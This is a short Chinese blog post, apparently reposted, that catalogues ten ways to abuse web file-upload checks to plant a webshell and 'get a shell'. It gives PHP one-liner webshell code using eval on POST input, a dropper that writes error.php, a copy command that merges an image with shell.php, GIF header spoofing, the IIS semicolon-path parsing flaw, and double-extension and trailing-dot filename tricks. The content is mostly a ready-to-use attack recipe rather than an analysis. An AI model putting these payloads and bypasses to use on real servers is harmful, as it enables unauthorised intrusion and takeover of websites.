1、文件头+GIF89a法。(php)gif 文件头欺骗,gif89a文件头检测是指程序为了他人将asp等文件后缀改为gif后上传,读取gif文件头,检测是否有gif87a或gif89a标记,是就允许上传,不是就说明不是gif文件。 而欺骗刚好是利用检测这两个标记,只要在木马代码前加gif87a就能骗过去。
2、使用edjpgcom工具向图片注入代码。(php)
3、cmd命令下copy 图片.GIF+shell.php webshell.php (php) //估计和1是同样的原理,我从来没成功过。
4、C32asm打开图片在文件末尾空一格加入代码<?php eval($_POST[cmd])?> 。(php)
5、在4基础上改进代码<?php fputs(fopen(“error.php”.”w”).”<?eval(\$_POST[cmd]);?>”)?> 。(php)//同目录下生成error.php
6、IIS解析目录名漏洞1.php;.jpg (jpg) //这是文件名变量没有过滤。
7、nc抓包改数据 //路径名和文件名没有过滤。
8、.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。
9.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell。
10.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。
总体来说IIS漏洞和抓包利用比较好使,上传不改文件名的程序系统早晚是要被干的
各种上传漏洞的利用方法
转载上一篇:主动FTP模式与被动FTP模式
下一篇:无线宽带接入漫谈
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
Web的几种上传方式总结
问题 文件上传在WEB开发中应用很广泛。 文件上传是指将本地图
上传 拖拽 ajax -
Java的OPTION操作漏洞 options方法漏洞利用
文章目录前言:OPTIONS 漏洞说明Nginx 修复方法环境说明修复测试Tomcat 修复方法环境说明修复测试Tomcat 版本:8.5.3 测试SpringBoot 项目修复方法环境说明修复测试总结 前言:OPTIONS 漏洞说明漏洞名称 : OPTIONS method is enabled风险级别: 低漏洞原因 : 可以通过 OPTIONS 方法访问 HTTP 服务漏洞说明: OPTIO
Java的OPTION操作漏洞 web安全 OPTIONS 漏洞修复 Nginx禁用OPTIONS Tomcat禁用OPTIONS